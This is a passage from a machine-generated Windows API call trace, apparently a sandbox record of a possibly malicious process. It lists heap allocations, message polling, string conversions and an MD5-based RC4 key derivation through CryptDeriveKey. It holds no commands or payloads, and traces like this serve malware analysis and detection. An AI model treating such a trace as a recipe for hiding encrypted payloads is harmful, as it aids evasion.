Size=0x8) returned 0x24b2bb8 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.740] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.740] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.740] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.740] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.741] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0254.741] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.741] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.742] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.743] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0254.743] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.743] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.744] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.744] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.744] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.744] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0254.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.745] CryptHashData (hHash=0xaa5760, pbData=0x24b18a8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0254.746] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.746] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.746] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.746] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.746] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.747] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.747] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.747] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.747] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.747] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.748] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0254.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0254.751] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: 